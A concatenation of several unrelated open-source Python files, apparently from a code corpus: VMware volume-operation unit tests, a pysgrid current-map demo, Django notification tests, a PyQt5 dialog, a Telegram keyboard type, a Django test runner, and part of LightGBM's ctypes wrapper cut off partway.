value = mock.sentinel.value
backing = mock.Mock(value=value)
self.assertIsNone(self.vops.get_profile(backing))
pbm = self.session.pbm
profile_manager = pbm.service_content.profileManager
exp_calls = [mock.call(pbm, 'PbmQueryAssociatedProfile',
profile_manager, entity=server_obj)]
self.assertEqual(exp_calls, self.session.invoke_api.call_args_list)
self.assertEqual(value, server_obj.key)
self.assertEqual('virtualMachine', server_obj.objectType)
self.session.invoke_api.side_effect = None
def test_extend_virtual_disk(self):
"""Test volumeops.extend_virtual_disk."""
task = mock.sentinel.task
invoke_api = self.session.invoke_api
invoke_api.return_value = task
disk_mgr = self.session.vim.service_content.virtualDiskManager
fake_size = 5
fake_size_in_kb = fake_size * units.Mi
fake_name = 'fake_volume_0000000001'
fake_dc = mock.sentinel.datacenter
self.vops.extend_virtual_disk(fake_size,
fake_name, fake_dc)
invoke_api.assert_called_once_with(self.session.vim,
"ExtendVirtualDisk_Task",
disk_mgr,
name=fake_name,
datacenter=fake_dc,
newCapacityKb=fake_size_in_kb,
eagerZero=False)
self.session.wait_for_task.assert_called_once_with(task)
class VirtualDiskPathTest(test.TestCase):
"""Unit tests for VirtualDiskPath."""
def setUp(self):
super(VirtualDiskPathTest, self).setUp()
self._path = volumeops.VirtualDiskPath("nfs", "A/B/", "disk")
def test_get_datastore_file_path(self):
self.assertEqual("[nfs] A/B/disk.vmdk",
self._path.get_datastore_file_path("nfs",
"A/B/disk.vmdk"))
def test_get_descriptor_file_path(self):
self.assertEqual("A/B/disk.vmdk",
self._path.get_descriptor_file_path())
def test_get_descriptor_ds_file_path(self):
self.assertEqual("[nfs] A/B/disk.vmdk",
self._path.get_descriptor_ds_file_path())
class FlatExtentVirtualDiskPathTest(test.TestCase):
"""Unit tests for FlatExtentVirtualDiskPath."""
def setUp(self):
super(FlatExtentVirtualDiskPathTest, self).setUp()
self._path = volumeops.FlatExtentVirtualDiskPath("nfs", "A/B/", "disk")
def test_get_flat_extent_file_path(self):
self.assertEqual("A/B/disk-flat.vmdk",
self._path.get_flat_extent_file_path())
def test_get_flat_extent_ds_file_path(self):
self.assertEqual("[nfs] A/B/disk-flat.vmdk",
self._path.get_flat_extent_ds_file_path())
class VirtualDiskTypeTest(test.TestCase):
"""Unit tests for VirtualDiskType."""
def test_is_valid(self):
self.assertTrue(volumeops.VirtualDiskType.is_valid("thick"))
self.assertTrue(volumeops.VirtualDiskType.is_valid("thin"))
self.assertTrue(volumeops.VirtualDiskType.is_valid("eagerZeroedThick"))
self.assertFalse(volumeops.VirtualDiskType.is_valid("preallocated"))
def test_validate(self):
volumeops.VirtualDiskType.validate("thick")
volumeops.VirtualDiskType.validate("thin")
volumeops.VirtualDiskType.validate("eagerZeroedThick")
self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
volumeops.VirtualDiskType.validate,
"preallocated")
def test_get_virtual_disk_type(self):
self.assertEqual("preallocated",
volumeops.VirtualDiskType.get_virtual_disk_type(
"thick"))
self.assertEqual("thin",
volumeops.VirtualDiskType.get_virtual_disk_type(
"thin"))
self.assertEqual("eagerZeroedThick",
volumeops.VirtualDiskType.get_virtual_disk_type(
"eagerZeroedThick"))
self.assertRaises(vmdk_exceptions.InvalidDiskTypeException,
volumeops.VirtualDiskType.get_virtual_disk_type,
"preallocated")
class VirtualDiskAdapterTypeTest(test.TestCase):
"""Unit tests for VirtualDiskAdapterType."""
def test_is_valid(self):
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("lsiLogic"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("busLogic"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid(
"lsiLogicsas"))
self.assertTrue(volumeops.VirtualDiskAdapterType.is_valid("ide"))
self.assertFalse(volumeops.VirtualDiskAdapterType.is_valid("pvscsi"))
def test_validate(self):
volumeops.VirtualDiskAdapterType.validate("lsiLogic")
volumeops.VirtualDiskAdapterType.validate("busLogic")
volumeops.VirtualDiskAdapterType.validate("lsiLogicsas")
volumeops.VirtualDiskAdapterType.validate("ide")
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.VirtualDiskAdapterType.validate,
"pvscsi")
def test_get_adapter_type(self):
self.assertEqual("lsiLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"lsiLogic"))
self.assertEqual("busLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"busLogic"))
self.assertEqual("lsiLogic",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"lsiLogicsas"))
self.assertEqual("ide",
volumeops.VirtualDiskAdapterType.get_adapter_type(
"ide"))
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.VirtualDiskAdapterType.get_adapter_type,
"pvscsi")
class ControllerTypeTest(test.TestCase):
"""Unit tests for ControllerType."""
def test_get_controller_type(self):
self.assertEqual(volumeops.ControllerType.LSI_LOGIC,
volumeops.ControllerType.get_controller_type(
'lsiLogic'))
self.assertEqual(volumeops.ControllerType.BUS_LOGIC,
volumeops.ControllerType.get_controller_type(
'busLogic'))
self.assertEqual(volumeops.ControllerType.LSI_LOGIC_SAS,
volumeops.ControllerType.get_controller_type(
'lsiLogicsas'))
self.assertEqual(volumeops.ControllerType.IDE,
volumeops.ControllerType.get_controller_type(
'ide'))
self.assertRaises(vmdk_exceptions.InvalidAdapterTypeException,
volumeops.ControllerType.get_controller_type,
'invalid_type')
def test_is_scsi_controller(self):
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.LSI_LOGIC))
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.BUS_LOGIC))
self.assertTrue(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.LSI_LOGIC_SAS))
self.assertFalse(volumeops.ControllerType.is_scsi_controller(
volumeops.ControllerType.IDE))
| rakeshmi/cinder | cinder/tests/unit/test_vmware_volumeops.py | Python | apache-2.0 | 73,767 |
from __future__ import (absolute_import, division, print_function)
from netCDF4 import Dataset
import numpy as np
import pysgrid
import matplotlib.pyplot as plt
import cartopy.crs as ccrs
# from cartopy.io import shapereader
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
# rotation is still ugly...
from pysgrid.processing_2d import rotate_vectors, vector_sum
# url = ('http://geoport.whoi.edu/thredds/dodsC/clay/usgs/users/jcwarner/Projects/Sandy/triple_nest/00_dir_NYB05.ncml') # noqa
url2 = ('http://geoport-dev.whoi.edu/thredds/dodsC/clay/usgs/users/zdefne/run076/his/00_dir_roms_display.ncml') # noqa
nc = Dataset(url2)
sgrid = pysgrid.load_grid(nc)
sgrid # We need a better __repr__ and __str__ !!!
lons, lats = np.mgrid[-74.38:-74.26:600j, 39.45:39.56:600j]
points = np.stack((lons, lats), axis=-1)
print(points.shape)
time_idx = 0
v_idx = 0
interp_u = sgrid.interpolate_var_to_points(
points, sgrid.u[time_idx, v_idx], slices=None)
interp_v = sgrid.interpolate_var_to_points(
points, sgrid.v, slices=[time_idx, v_idx])
ind = sgrid.locate_faces(points)
ang_ind = ind + [1, 1]
angles = sgrid.angles[:][ang_ind[:, 0], ang_ind[:, 1]]
u_rot, v_rot = rotate_vectors(interp_u, interp_v, angles)
u_rot = u_rot.reshape(600, -1)
v_rot = v_rot.reshape(600, -1)
uv_vector_sum = vector_sum(u_rot, v_rot)
def make_map(projection=ccrs.PlateCarree(), figsize=(20, 20)):
fig, ax = plt.subplots(figsize=figsize,
subplot_kw=dict(projection=projection))
gl = ax.gridlines(draw_labels=True)
gl.xlabels_top = gl.ylabels_right = False
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
return fig, ax
mscale = 1
vscale = 10
scale = 0.03
lon_data = lons
lat_data = lats
fig, ax = make_map()
kw = dict(scale=1.0 / scale, pivot='middle', width=0.003, color='black')
cs = plt.pcolormesh(lon_data[::mscale, ::mscale],
lat_data[::mscale, ::mscale],
uv_vector_sum[::mscale, ::mscale], zorder=1, cmap=plt.cm.rainbow)
ax.coastlines('10m')
plt.show()
| ayan-usgs/pysgrid | demos/inlet_heatmap.py | Python | bsd-3-clause | 2,094 |
# Copyright (c) 2009 Participatory Culture Foundation
# See LICENSE for details.
from django.http import HttpResponse
from channelguide.testframework import TestCase
class NotificationViewTestCase(TestCase):
def test_add_notification(self):
"""
Test that notifications are added when request.add_notification() is called.
"""
request = self.process_request()
request.add_notification('title', 'body')
request.add_notification(None, 'None body')
self.assertEquals(request.notifications,
[('title', 'body'),
(None, 'None body')])
def test_display_notifications(self):
"""
Test that notifications are displayed when they're added.
"""
request = self.process_request()
request.add_notification('title', 'body')
request.add_notification(None, 'None body')
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertTrue('title' in response.content)
self.assertTrue('body' in response.content)
self.assertTrue('None body' in response.content)
def test_notifications_from_session(self):
"""
If there is a 'notifications' key in the session, its notifications
should be added to those added by the view on the next load.
"""
request = self.process_request()
request.session['notifications'] = [('session title', 'session body')]
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertFalse('session' in response.content)
cookies = response.cookies
request = self.process_request(cookies) # next request should show the
# notification
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertTrue('session title' in response.content)
self.assertTrue('session body' in response.content)
request = self.process_request(cookies) # third request shouldn't show
# the notification
response = HttpResponse('<!-- NOTIFICATION BAR -->')
self.process_response_middleware(request, response)
self.assertFalse('session title' in response.content)
| kmshi/miroguide | channelguide/notifications/tests.py | Python | agpl-3.0 | 2,468 |
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.uic import *
class MyOverlayDlg (QDialog) :
secondFlag = False
infile = ""
def __init__(self) :
QDialog.__init__(self)
self.ui = loadUi("uiPlotOverlayDlg.ui", self)
self.ui.overlayBrowseButton.clicked.connect (self.browseFile)
def setParams (self, infl, sflag) :
self.ui.useSecondAxisCB.setChecked (sflag)
self.ui.overlayFileLE.setText(infl)
    def accept (self) :
        # In PyQt5, QLineEdit.text() already returns a Python str, so no
        # QString conversion (toLatin1/data) is needed.
        self.infile = self.ui.overlayFileLE.text()
        # store the checkbox state on the instance, not in a local variable
        self.secondFlag = self.ui.useSecondAxisCB.isChecked()
        QDialog.accept(self)
    def browseFile (self) :
        # PyQt5's getOpenFileName returns a (filename, selected_filter) tuple
        fname, _ = QFileDialog.getOpenFileName (self, "Overlay XY ASCII File", self.infile, "Text Files (*.txt *.*)")
        if fname :
            self.overlayFileLE.setText (fname)
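# A minimal usage sketch (illustrative only; assumes a running QApplication and
# that uiPlotOverlayDlg.ui is present in the working directory):
#
#     dlg = MyOverlayDlg()
#     dlg.setParams("overlay.txt", False)
#     if dlg.exec_() == QDialog.Accepted:
#         print(dlg.infile, dlg.secondFlag)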
| comptech/atrex | Software/MyOverlayDlg.py | Python | lgpl-3.0 | 880 |
'''
TelegramAPy
Copyright (C) 2015 Giove Andrea
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''
import json
class ReplayKeyboardHide:
FIELD_HIDEKEYBOARD = 'hide_keyboard'
FIELD_SELECTIVE = 'selective'
def __init__(self, hide_keyboard, selective=None):
self.hide_keyboard = hide_keyboard
self.selective = selective
def encode(self):
out = {ReplayKeyboardHide.FIELD_HIDEKEYBOARD: self.hide_keyboard}
if self.selective:
out[ReplayKeyboardHide.FIELD_SELECTIVE] = self.selective
return json.dumps(out)
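# A minimal, illustrative self-check (hedged): running this module directly
# prints the JSON produced by encode(); key order follows insertion order.
if __name__ == "__main__":
    markup = ReplayKeyboardHide(True, selective=True)
    print(markup.encode())  # expected: {"hide_keyboard": true, "selective": true}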
| aadeg/TelegramAPy | telegramapy/types/replaykeyboardhide.py | Python | gpl-2.0 | 1,208 |
#!/usr/bin/env python
"""
This script is a trick to setup a fake Django environment, since this reusable
app will be developed and tested outside any specifiv Django project.
Via ``settings.configure`` you will be able to set all necessary settings
for your app and run the tests as if you were calling ``./manage.py test``.
Taken from https://github.com/mbrochh/tdd-with-django-reusable-app
"""
import os
import sys
from django.conf import settings
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
]
INTERNAL_APPS = [
'portlet',
'django_nose',
]
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
COVERAGE_MODULE_EXCLUDES = [
'tests$', 'settings$', 'urls$', 'locale$',
'migrations', 'fixtures', 'admin$', 'django_extensions',
]
COVERAGE_MODULE_EXCLUDES += EXTERNAL_APPS
if not settings.configured:
settings.configure(
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": ":memory:",
}
},
INSTALLED_APPS=INSTALLED_APPS,
ROOT_URLCONF='portlet.urls',
TEMPLATE_DIRS=(
os.path.join(os.path.dirname(__file__), '../templates'),
),
COVERAGE_MODULE_EXCLUDES=COVERAGE_MODULE_EXCLUDES,
COVERAGE_REPORT_HTML_OUTPUT_DIR=os.path.join(
os.path.dirname(__file__), 'coverage')
)
from django_coverage.coverage_runner import CoverageRunner
from django_nose import NoseTestSuiteRunner
class NoseCoverageTestRunner(CoverageRunner, NoseTestSuiteRunner):
"""Custom test runner that uses nose and coverage"""
pass
def runtests(*test_args):
failures = NoseTestSuiteRunner(verbosity=2, interactive=True).run_tests(test_args)
sys.exit(failures)
if __name__ == '__main__':
runtests(*sys.argv[1:])
| uhuramedia/django-portlet | portlet/tests/runtests.py | Python | bsd-3-clause | 2,032 |
# coding: utf-8
# pylint: disable = invalid-name, C0111, C0301
# pylint: disable = R0912, R0913, R0914, W0105, W0201, W0212
"""Wrapper c_api of LightGBM"""
from __future__ import absolute_import
import ctypes
import os
import warnings
from tempfile import NamedTemporaryFile
import numpy as np
import scipy.sparse
from .compat import (DataFrame, Series, integer_types, json,
json_default_with_numpy, numeric_types, range_,
string_type)
from .libpath import find_lib_path
def _load_lib():
"""Load LightGBM Library."""
lib_path = find_lib_path()
if len(lib_path) == 0:
raise Exception("cannot find LightGBM library")
lib = ctypes.cdll.LoadLibrary(lib_path[0])
lib.LGBM_GetLastError.restype = ctypes.c_char_p
return lib
_LIB = _load_lib()
class LightGBMError(Exception):
"""Error throwed by LightGBM"""
pass
def _safe_call(ret):
"""Check the return value of C API call
Parameters
----------
ret : int
return value from API calls
"""
if ret != 0:
raise LightGBMError(_LIB.LGBM_GetLastError())
def is_numeric(obj):
"""Check is a number or not, include numpy number etc."""
try:
float(obj)
return True
except (TypeError, ValueError):
# TypeError: obj is not a string or a number
# ValueError: invalid literal
return False
def is_numpy_1d_array(data):
"""Check is 1d numpy array"""
return isinstance(data, np.ndarray) and len(data.shape) == 1
def is_1d_list(data):
"""Check is 1d list"""
return isinstance(data, list) and \
(not data or isinstance(data[0], numeric_types))
def list_to_1d_numpy(data, dtype=np.float32, name='list'):
"""convert to 1d numpy array"""
if is_numpy_1d_array(data):
if data.dtype == dtype:
return data
else:
return data.astype(dtype=dtype, copy=False)
elif is_1d_list(data):
return np.array(data, dtype=dtype, copy=False)
elif isinstance(data, Series):
return data.values.astype(dtype)
else:
raise TypeError("Wrong type({}) for {}, should be list or numpy array".format(type(data).__name__, name))
def cfloat32_array_to_numpy(cptr, length):
"""Convert a ctypes float pointer array to a numpy array.
"""
if isinstance(cptr, ctypes.POINTER(ctypes.c_float)):
return np.fromiter(cptr, dtype=np.float32, count=length)
else:
raise RuntimeError('Expected float pointer')
def cfloat64_array_to_numpy(cptr, length):
"""Convert a ctypes double pointer array to a numpy array.
"""
if isinstance(cptr, ctypes.POINTER(ctypes.c_double)):
return np.fromiter(cptr, dtype=np.float64, count=length)
else:
raise RuntimeError('Expected double pointer')
def cint32_array_to_numpy(cptr, length):
"""Convert a ctypes float pointer array to a numpy array.
"""
if isinstance(cptr, ctypes.POINTER(ctypes.c_int32)):
return np.fromiter(cptr, dtype=np.int32, count=length)
else:
raise RuntimeError('Expected int pointer')
def c_str(string):
"""Convert a python string to cstring."""
return ctypes.c_char_p(string.encode('utf-8'))
def c_array(ctype, values):
"""Convert a python array to c array."""
return (ctype * len(values))(*values)
def param_dict_to_str(data):
if data is None or not data:
return ""
pairs = []
for key, val in data.items():
if isinstance(val, (list, tuple, set)) or is_numpy_1d_array(val):
pairs.append(str(key) + '=' + ','.join(map(str, val)))
elif isinstance(val, string_type) or isinstance(val, numeric_types) or is_numeric(val):
pairs.append(str(key) + '=' + str(val))
else:
raise TypeError('Unknown type of parameter:%s, got:%s'
% (key, type(val).__name__))
return ' '.join(pairs)
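# A minimal illustration of param_dict_to_str (hedged; key order follows dict
# iteration order):
#
#     param_dict_to_str({'num_leaves': 31, 'metric': ['l2', 'auc']})
#     # -> 'num_leaves=31 metric=l2,auc'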
class _temp_file(object):
def __enter__(self):
with NamedTemporaryFile(prefix="lightgbm_tmp_", delete=True) as f:
self.name = f.name
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if os.path.isfile(self.name):
os.remove(self.name)
def readlines(self):
with open(self.name, "r+") as f:
ret = f.readlines()
return ret
def writelines(self, lines):
with open(self.name, "w+") as f:
f.writelines(lines)
"""marco definition of data type in c_api of LightGBM"""
C_API_DTYPE_FLOAT32 = 0
C_API_DTYPE_FLOAT64 = 1
C_API_DTYPE_INT32 = 2
C_API_DTYPE_INT64 = 3
"""Matric is row major in python"""
C_API_IS_ROW_MAJOR = 1
"""marco definition of prediction type in c_api of LightGBM"""
C_API_PREDICT_NORMAL = 0
C_API_PREDICT_RAW_SCORE = 1
C_API_PREDICT_LEAF_INDEX = 2
"""data type of data field"""
FIELD_TYPE_MAPPER = {"label": C_API_DTYPE_FLOAT32,
"weight": C_API_DTYPE_FLOAT32,
"init_score": C_API_DTYPE_FLOAT64,
"group": C_API_DTYPE_INT32}
def c_float_array(data):
"""get pointer of float numpy array / list"""
if is_1d_list(data):
data = np.array(data, copy=False)
if is_numpy_1d_array(data):
if data.dtype == np.float32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_float))
type_data = C_API_DTYPE_FLOAT32
elif data.dtype == np.float64:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_double))
type_data = C_API_DTYPE_FLOAT64
else:
raise TypeError("Expected np.float32 or np.float64, met type({})"
.format(data.dtype))
else:
raise TypeError("Unknown type({})".format(type(data).__name__))
return (ptr_data, type_data)
def c_int_array(data):
"""get pointer of int numpy array / list"""
if is_1d_list(data):
data = np.array(data, copy=False)
if is_numpy_1d_array(data):
if data.dtype == np.int32:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_int32))
type_data = C_API_DTYPE_INT32
elif data.dtype == np.int64:
ptr_data = data.ctypes.data_as(ctypes.POINTER(ctypes.c_int64))
type_data = C_API_DTYPE_INT64
else:
raise TypeError("Expected np.int32 or np.int64, met type({})"
.format(data.dtype))
else:
raise TypeError("Unknown type({})".format(type(data).__name__))
return (ptr_data, type_data)
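# Both helpers return a (ctypes pointer, type code) pair, e.g. (illustrative):
#
#     ptr, type_code = c_float_array(np.array([1.0, 2.0], dtype=np.float32))
#     # type_code == C_API_DTYPE_FLOAT32
#     ptr, type_code = c_int_array(np.array([1, 2], dtype=np.int32))
#     # type_code == C_API_DTYPE_INT32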
PANDAS_DTYPE_MAPPER = {'int8': 'int', 'int16': 'int', 'int32': 'int',
'int64': 'int', 'uint8': 'int', 'uint16': 'int',
'uint32': 'int', 'uint64': 'int', 'float16': 'float',
'float32': 'float', 'float64': 'float', 'bool': 'int'}
def _data_from_pandas(data, feature_name, categorical_feature, pandas_categorical):
if isinstance(data, DataFrame):
if feature_name == 'auto' or feature_name is None:
if all([isinstance(name, integer_types + (np.integer, )) for name in data.columns]):
msg = """Using Pandas (default) integer column names, not column indexes. You can use indexes with DataFrame.values."""
warnings.filterwarnings('once')
warnings.warn(msg, stacklevel=5)
data = data.rename(columns=str)
cat_cols = data.select_dtypes(include=['category']).columns
if pandas_categorical is None: # train dataset
pandas_categorical = [list(data[col].cat.categories) for col in cat_cols]
else:
if len(cat_cols) != len(pandas_categorical):
raise ValueError('train and valid dataset categorical_feature do not match.')
for col, category in zip(cat_cols, pandas_categorical):
if list(data[col].cat.categories) != list(category):
data[col] = data[col].cat.set_categories(category)
if len(cat_cols): # cat_cols is pandas Index object
data = data.copy() # not alter origin DataFrame
data[cat_cols] = data[cat_cols].apply(lambda x: x.cat.codes)
if categorical_feature is not None:
if feature_name is None:
feature_name = list(data.columns)
if categorical_feature == 'auto':
categorical_feature = list(cat_cols)
else:
categorical_feature = list(categorical_feature) + list(cat_cols)
if feature_name == 'auto':
feature_name = list(data.columns)
data_dtypes = data.dtypes
if not all(dtype.name in PANDAS_DTYPE_MAPPER for dtype in data_dtypes):
bad_fields = [data.columns[i] for i, dtype in
enumerate(data_dtypes) if dtype.name not in PANDAS_DTYPE_MAPPER]
msg = """DataFrame.dtypes for data must be int, float or bool. Did not expect the data types in fields """
raise ValueError(msg + ', '.join(bad_fields))
data = data.values.astype('float')
else:
if feature_name == 'auto':
feature_name = None
if categorical_feature == 'auto':
categorical_feature = None
return data, feature_name, categorical_feature, pandas_categorical
def _label_from_pandas(label):
if isinstance(label, DataFrame):
if len(label.columns) > 1:
raise ValueError('DataFrame for label cannot have multiple columns')
label_dtypes = label.dtypes
if not all(dtype.name in PANDAS_DTYPE_MAPPER for dtype in label_dtypes):
raise ValueError('DataFrame.dtypes for label must be int, float or bool')
label = label.values.astype('float')
return label
def _save_pandas_categorical(file_name, pandas_categorical):
with open(file_name, 'a') as f:
f.write('\npandas_categorical:' + json.dumps(pandas_categorical, default=json_default_with_numpy))
def _load_pandas_categorical(file_name):
with open(file_name, 'r') as f:
last_line = f.readlines()[-1]
if last_line.startswith('pandas_categorical:'):
return json.loads(last_line[len('pandas_categorical:'):])
return None
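# The two helpers above write/read a single trailer line appended to the model
# file, e.g. (illustrative category lists):
#
#     pandas_categorical:[["a", "b"], ["x", "y"]]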
class _InnerPredictor(object):
"""
A _InnerPredictor of LightGBM.
    Only used for prediction, usually for continued training.
    Note: Can be converted from a Booster, but cannot be converted back to a Booster.
"""
def __init__(self, model_file=None, booster_handle=None):
"""Initialize the _InnerPredictor. Not expose to user
Parameters
----------
model_file : string
Path to the model file.
booster_handle : Handle of Booster
            Use this handle to initialize the predictor.
"""
self.handle = ctypes.c_void_p()
self.__is_manage_handle = True
if model_file is not None:
"""Prediction task"""
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterCreateFromModelfile(
c_str(model_file),
ctypes.byref(out_num_iterations),
ctypes.byref(self.handle)))
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.num_class = out_num_class.value
self.num_total_iteration = out_num_iterations.value
self.pandas_categorical = _load_pandas_categorical(model_file)
elif booster_handle is not None:
self.__is_manage_handle = False
self.handle = booster_handle
out_num_class = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetNumClasses(
self.handle,
ctypes.byref(out_num_class)))
self.num_class = out_num_class.value
out_num_iterations = ctypes.c_int(0)
_safe_call(_LIB.LGBM_BoosterGetCurrentIteration(
self.handle,
ctypes.byref(out_num_iterations)))
self.num_total_iteration = out_num_iterations.value
self.pandas_categorical = None
else:
raise TypeError('Need Model file or Booster handle to create a predictor')
def __del__(self):
if self.__is_manage_handle:
_safe_call(_LIB.LGBM_BoosterFree(self.handle))
def predict(self, data, num_iteration=-1,
raw_score=False, pred_leaf=False, data_has_header=False,
is_reshape=True):
"""
Predict logic
Parameters
----------
data : string/numpy array/scipy.sparse
Data source for prediction
When data type is string, it represents the path of txt file
num_iteration : int
Used iteration for prediction
raw_score : bool
True for predict raw score
pred_leaf : bool
True for predict leaf index
data_has_header : bool
Used for txt data, True if txt data has header
is_reshape : bool
Reshape to (nrow, ncol) if true
Returns
-------
Prediction result
"""
if isinstance(data, Dataset):
raise TypeError("Cannot use Dataset instance for prediction, please use raw data instead")
data = _data_from_pandas(data, None, None, self.pandas_categorical)[0]
predict_type = C_API_PREDICT_NORMAL
if raw_score:
predict_type = C_API_PREDICT_RAW_SCORE
if pred_leaf:
predict_type = C_API_PREDICT_LEAF_INDEX
int_data_has_header = 1 if data_has_header else 0
if num_iteration > self.num_total_iteration:
num_iteration = self.num_total_iteration
if isinstance(data, string_type):
with _temp_file() as f:
_safe_call(_LIB.LGBM_BoosterPredictForFile(
self.handle,
c_str(data),
ctypes.c_int(int_data_has_header),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
c_str(f.name)))
lines = f.readlines()
nrow = len(lines)
preds = [float(token) for line in lines for token in line.split('\t')]
preds = np.array(preds, dtype=np.float64, copy=False)
elif isinstance(data, scipy.sparse.csr_matrix):
preds, nrow = self.__pred_for_csr(data, num_iteration,
predict_type)
elif isinstance(data, scipy.sparse.csc_matrix):
preds, nrow = self.__pred_for_csc(data, num_iteration,
predict_type)
elif isinstance(data, np.ndarray):
preds, nrow = self.__pred_for_np2d(data, num_iteration,
predict_type)
elif isinstance(data, DataFrame):
preds, nrow = self.__pred_for_np2d(data.values, num_iteration,
predict_type)
else:
try:
csr = scipy.sparse.csr_matrix(data)
preds, nrow = self.__pred_for_csr(csr, num_iteration,
predict_type)
except:
raise TypeError('Cannot predict data for type {}'.format(type(data).__name__))
if pred_leaf:
preds = preds.astype(np.int32)
if is_reshape and preds.size != nrow:
if preds.size % nrow == 0:
preds = preds.reshape(nrow, -1)
else:
                raise ValueError('Length of predict result (%d) cannot be divided by nrow (%d)'
% (preds.size, nrow))
return preds
def __get_num_preds(self, num_iteration, nrow, predict_type):
"""
Get size of prediction result
"""
n_preds = ctypes.c_int64(0)
_safe_call(_LIB.LGBM_BoosterCalcNumPredict(
self.handle,
ctypes.c_int(nrow),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(n_preds)))
return n_preds.value
def __pred_for_np2d(self, mat, num_iteration, predict_type):
"""
Predict for a 2-D numpy matrix.
"""
if len(mat.shape) != 2:
raise ValueError('Input numpy.ndarray must be 2 dimensional')
if mat.dtype == np.float32 or mat.dtype == np.float64:
data = np.array(mat.reshape(mat.size), dtype=mat.dtype, copy=False)
else:
"""change non-float data to float data, need to copy"""
data = np.array(mat.reshape(mat.size), dtype=np.float32)
ptr_data, type_ptr_data = c_float_array(data)
n_preds = self.__get_num_preds(num_iteration, mat.shape[0],
predict_type)
preds = np.zeros(n_preds, dtype=np.float64)
out_num_preds = ctypes.c_int64(0)
_safe_call(_LIB.LGBM_BoosterPredictForMat(
self.handle,
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int(mat.shape[0]),
ctypes.c_int(mat.shape[1]),
ctypes.c_int(C_API_IS_ROW_MAJOR),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(out_num_preds),
preds.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if n_preds != out_num_preds.value:
raise ValueError("Wrong length for predict results")
return preds, mat.shape[0]
def __pred_for_csr(self, csr, num_iteration, predict_type):
"""
Predict for a csr data
"""
nrow = len(csr.indptr) - 1
n_preds = self.__get_num_preds(num_iteration, nrow, predict_type)
preds = np.zeros(n_preds, dtype=np.float64)
out_num_preds = ctypes.c_int64(0)
ptr_indptr, type_ptr_indptr = c_int_array(csr.indptr)
ptr_data, type_ptr_data = c_float_array(csr.data)
_safe_call(_LIB.LGBM_BoosterPredictForCSR(
self.handle,
ptr_indptr,
ctypes.c_int32(type_ptr_indptr),
csr.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csr.indptr)),
ctypes.c_int64(len(csr.data)),
ctypes.c_int64(csr.shape[1]),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(out_num_preds),
preds.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if n_preds != out_num_preds.value:
raise ValueError("Wrong length for predict results")
return preds, nrow
def __pred_for_csc(self, csc, num_iteration, predict_type):
"""
Predict for a csc data
"""
nrow = csc.shape[0]
n_preds = self.__get_num_preds(num_iteration, nrow, predict_type)
preds = np.zeros(n_preds, dtype=np.float64)
out_num_preds = ctypes.c_int64(0)
ptr_indptr, type_ptr_indptr = c_int_array(csc.indptr)
ptr_data, type_ptr_data = c_float_array(csc.data)
_safe_call(_LIB.LGBM_BoosterPredictForCSC(
self.handle,
ptr_indptr,
ctypes.c_int32(type_ptr_indptr),
csc.indices.ctypes.data_as(ctypes.POINTER(ctypes.c_int32)),
ptr_data,
ctypes.c_int(type_ptr_data),
ctypes.c_int64(len(csc.indptr)),
ctypes.c_int64(len(csc.data)),
ctypes.c_int64(csc.shape[0]),
ctypes.c_int(predict_type),
ctypes.c_int(num_iteration),
ctypes.byref(out_num_preds),
preds.ctypes.data_as(ctypes.POINTER(ctypes.c_double))))
if n_preds != out_num_preds.value:
raise ValueError("Wrong length for predict results")
return preds, nrow
class Dataset(object):
"""Dataset in LightGBM."""
def __init__(self, data, label=None, max_bin=255, reference=None,
weight=None, group=None, silent=False,
